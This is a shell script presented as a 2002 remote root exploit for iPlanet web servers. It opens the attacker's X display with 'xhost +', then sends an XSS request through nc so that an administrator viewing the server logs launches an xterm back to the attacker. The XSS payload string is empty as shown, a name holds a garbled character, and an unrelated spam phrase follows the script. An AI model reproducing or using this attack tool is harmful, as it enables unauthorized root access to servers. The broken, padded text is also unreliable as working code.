#!/bin/sh # # iPlanet Remote root exploit # Tested versions: 4.* up to SP11 # # By: Ferm韓 J. Serna CTO, NGSEC # http://www.ngsec.com # # Madrid, 09/10/2002 echo "iPlanet (4.* up to SP11) Remote root exploit by Fermin J. Serna CTO, NGSEC" echo "http://www.ngsec.com " echo if [ $# != "3" ] then echo "Usage: $0 " exit fi echo "1.- Setting xhost +$1" xhost +$1 echo echo "2.- Building XSS string:" CADENA="" echo $CADENA echo echo "3.- Sending HTTP request:" SEND="GET /$CADENA HTTP/1.0" echo "$SEND" (echo "$SEND"; echo "Host: $1"; echo; echo) | nc $1 $2 echo echo echo "4.- Time to wait for the xterm :P. Admin should review Web Server logs using Admin Server Tool." echo

亚洲欧美在线